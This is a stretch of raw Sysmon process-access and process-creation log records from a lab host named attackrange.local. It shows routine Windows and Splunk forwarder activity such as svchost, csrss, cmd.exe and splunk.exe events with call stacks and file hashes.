Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3C00-000000007F01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.776{733EE690-3E0A-5F80-3A00-000000007F01}38323836C:\Windows\system32\cmd.exe{733EE690-3E0A-5F80-3C00-000000007F01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.771{733EE690-3E0A-5F80-3C00-000000007F01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{733EE690-3E0A-5F80-3A00-000000007F01}3832C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.760{733EE690-3E0A-5F80-3B00-000000007F01}38403860C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-3A00-000000007F01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3B00-000000007F01}3840C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-3A00-000000007F01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.744{733EE690-3E09-5F80-3400-000000007F01}20322700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0A-5F80-3A00-000000007F01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.745{733EE690-3E0A-5F80-3A00-000000007F01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.666{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E0A-5F80-3900-000000007F01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 